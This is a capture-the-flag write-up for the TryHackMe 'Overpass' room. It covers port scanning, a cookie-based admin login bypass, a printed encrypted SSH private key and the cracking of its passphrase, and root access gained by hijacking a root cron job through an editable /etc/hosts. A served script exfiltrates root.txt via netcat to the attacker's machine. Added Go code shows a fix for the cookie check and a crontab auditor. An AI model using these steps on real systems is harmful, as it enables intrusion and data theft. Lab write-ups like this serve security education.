# Overpass

### TryHackMe - [Overpass](https://tryhackme.com/room/overpass) Created by [NinjaJc01](https://tryhackme.com/p/NinjaJc01)

### Scanning (IP : 10.10.233.36)

#### 1. NMAP

```
> sudo nmap -sC -sV 10.10.233.36

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:30 EDT
Nmap scan report for 10.10.233.36
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds
```

#### 2. GoBuster

```
> gobuster dir -u http://10.10.233.36 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.175.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/13 07:51:58 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/downloads            (Status: 301) [Size: 0] [--> downloads/]
/aboutus              (Status: 301) [Size: 0] [--> aboutus/]  
/admin                (Status: 301) [Size: 42] [--> /admin/]  
/css                  (Status: 301) [Size: 0] [--> css/]
===============================================================
2021/09/13 08:59:14 Finished
===============================================================
```

### Bypassing the login page

At `http://10.10.99.250/admin/` I see a login page that loads a few JavaScript files. In `login.js` I found the vulnerable logic (this is the tail of the login handler):

```
    // The server replies with either the literal string "Incorrect credentials"
    // or a session token; anything that is not the error string is trusted.
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value = ""
    } else {
        // The response body is stored as-is in the SessionToken cookie
        Cookies.set("SessionToken", statusOrCookie)
        window.location = "/admin"
    }
}
```

I set a `SessionToken` cookie with an empty value, reloaded, and BOOM!! I was logged in as admin. The page says:

> ## Welcome to the Overpass Administrator area
>
> #### A secure password manager with support for Windows, Linux, MacOS and more
>
> Since you keep forgetting your password, James, I've set up SSH keys for you.
>
> If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
> Also, we really need to talk about this "Military Grade" encryption. - Paradox
>
> ```
> -----BEGIN RSA PRIVATE KEY-----
> Proc-Type: 4,ENCRYPTED
> DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
>
> LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
> JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
> 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
> WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
> BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
> AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
> 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
> ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
> VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
> OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
> 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
> eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
> 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
> GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
> exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
> AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
> 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
> dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
> n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
> 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
> 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
> ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
> 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
> +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
> 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
> -----END RSA PRIVATE KEY-----
> ```
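The bypass works because the check behind `/admin` evidently only tests whether a `SessionToken` cookie is present, not whether its value is a token the server issued. As an added example (not code from the room or its author), the Go program below contrasts that presence-only test with one that validates the cookie against issued sessions; Go is used because Nmap fingerprinted a Golang `net/http` server, and the session store, the function names and the `requestWithCookie` helper are assumptions for illustration.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// Illustrative session store (token -> username). Assumed for this example;
// a real service would add expiry and persistence.
var sessions = struct {
	sync.Mutex
	tokens map[string]string
}{tokens: map[string]string{}}

// issueToken creates a random 256-bit session token after a successful login.
func issueToken(user string) (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(b)
	sessions.Lock()
	sessions.tokens[tok] = user
	sessions.Unlock()
	return tok, nil
}

// weakIsAdmin reproduces the flawed pattern: r.Cookie only fails when the
// cookie is absent, so "SessionToken=" (an empty value) passes the check.
func weakIsAdmin(r *http.Request) bool {
	_, err := r.Cookie("SessionToken")
	return err == nil
}

// strictIsAdmin accepts the request only if the cookie value matches a token
// this server issued, comparing in constant time. It returns the bound user.
func strictIsAdmin(r *http.Request) (string, bool) {
	c, err := r.Cookie("SessionToken")
	if err != nil || c.Value == "" {
		return "", false
	}
	sessions.Lock()
	defer sessions.Unlock()
	for tok, user := range sessions.tokens {
		if subtle.ConstantTimeCompare([]byte(tok), []byte(c.Value)) == 1 {
			return user, true
		}
	}
	return "", false
}

// requestWithCookie builds a GET /admin request carrying the given cookie
// value, mirroring what a browser sends after the cookie is set or edited.
func requestWithCookie(value string) *http.Request {
	r := httptest.NewRequest(http.MethodGet, "/admin", nil)
	r.AddCookie(&http.Cookie{Name: "SessionToken", Value: value})
	return r
}

func main() {
	empty := requestWithCookie("")
	fmt.Println("empty cookie, presence-only check:", weakIsAdmin(empty))
	_, ok := strictIsAdmin(empty)
	fmt.Println("empty cookie, validated check:   ", ok)

	tok, _ := issueToken("james")
	user, ok := strictIsAdmin(requestWithCookie(tok))
	fmt.Println("issued token, validated check:   ", ok, user)
}
```

The presence-only version is the one an empty or arbitrary cookie defeats; the validating version ties admin access to a token the server generated, which is the fix regardless of what the client-side `login.js` does.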

### Cracking the SSH private key passphrase

To recover the passphrase I use John the Ripper on Kali Linux. First I convert the encrypted RSA key into a hash John understands, using the [ssh2john.py](https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py) script.

```
python ssh2john.py id_rsa > id_rsa.hash
```

Now crack the hash with John:

```
> john id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
james13          (id_rsa)
```

The passphrase for the private key is `james13`. Now strip the passphrase from the key with OpenSSL:

```
openssl rsa -in id_rsa -out out.key -passin pass:james13
```

### Login to SSH and get user.txt

From the note on the admin page it is clear that the username is `james`.

```
ssh -i out.key james@10.10.175.22 -p 22
```

Now for `user.txt`:

```
cat user.txt
```

### Privilege escalation (root.txt)

There is an odd file, `todo.txt`, in james's home directory. It hints at checking the cron jobs, and there is indeed something strange in the crontab:

```
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
```

Then I notice that I can edit `/etc/hosts` and point `overpass.thm` at my own machine, so the cron job will fetch and run whatever script I serve, as root.

#### buildscript.sh

```
#!/bin/sh

cat /root/root.txt | nc <MY_IP> 1234
```

Then I start a Python web server on port 80 to serve `/downloads/src/buildscript.sh` (the path must match the URL in the cron job):

```
python3 -m http.server 80
```

And open a netcat listener to catch the flag the vulnerable machine sends back:

```
nc -lnvp 1234
```

And BOOM!! It sends back the contents of `root.txt`.
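The two conditions this chain relies on, a root cron job piping a plain-HTTP download into `bash` and an `/etc/hosts` that an unprivileged user can edit, are cheap to audit for. As an added example (not code from the room), the Go program below scans system-crontab lines for commands that fetch remote content and pipe it into a shell, notes when they run as root and without TLS, and checks whether `/etc/hosts` is writable by group or others. The sample crontab is constructed except for the entry quoted above; the function names and the `updates.example` host are assumptions.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"regexp"
	"strings"
)

// Constructed sample system crontab. Only the overpass.thm entry is from the
// room; the other lines are made up for the example.
const sampleCrontab = `# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * root wget -qO- http://updates.example/agent.sh | sh
0 3 * * * backup /usr/local/bin/backup.sh
`

// pipeToShell matches a download command whose output is piped into a shell.
var pipeToShell = regexp.MustCompile(`\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b`)

// Finding is one risky crontab entry and the reason it was flagged.
type Finding struct {
	Line   string
	Reason string
}

// auditCrontab returns one Finding per system-crontab entry that pipes
// fetched content into a shell, explaining why it is risky.
func auditCrontab(text string) []Finding {
	var out []Finding
	for _, raw := range strings.Split(text, "\n") {
		fields := strings.Fields(raw)
		// A system crontab entry is 5 schedule fields, a user, then the command;
		// comments and VAR=value lines have fewer fields and are skipped.
		if len(fields) < 7 || strings.HasPrefix(fields[0], "#") {
			continue
		}
		user, cmd := fields[5], strings.Join(fields[6:], " ")
		if !pipeToShell.MatchString(cmd) {
			continue
		}
		reason := "remote content piped straight into a shell"
		if user == "root" {
			reason += ", running as root"
		}
		if !strings.Contains(cmd, "https://") {
			reason += "; fetched without TLS, so whoever controls name resolution (DNS or /etc/hosts) controls what runs"
		}
		out = append(out, Finding{Line: strings.TrimSpace(raw), Reason: reason})
	}
	return out
}

// writableByOthers reports whether a file mode grants write to group or others.
// /etc/hosts should normally be mode 0644 and owned by root.
func writableByOthers(mode fs.FileMode) bool {
	return mode.Perm()&0o022 != 0
}

func main() {
	for _, f := range auditCrontab(sampleCrontab) {
		fmt.Printf("%s\n    -> %s\n", f.Line, f.Reason)
	}
	if st, err := os.Stat("/etc/hosts"); err == nil {
		fmt.Printf("/etc/hosts mode %v, writable by group/others: %v\n",
			st.Mode().Perm(), writableByOthers(st.Mode()))
	}
}
```

Run against the constructed crontab it flags the `overpass.thm` entry and the `wget | sh` entry and leaves the ordinary jobs alone; on a real host, point it at the contents of `/etc/crontab` and the `/etc/cron.d` files. The remedy is the same in each case: ship the script on the host (or verify a signature) instead of piping a download into a shell, and keep `/etc/hosts` writable only by root.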

## THANK YOU FOR READING :)
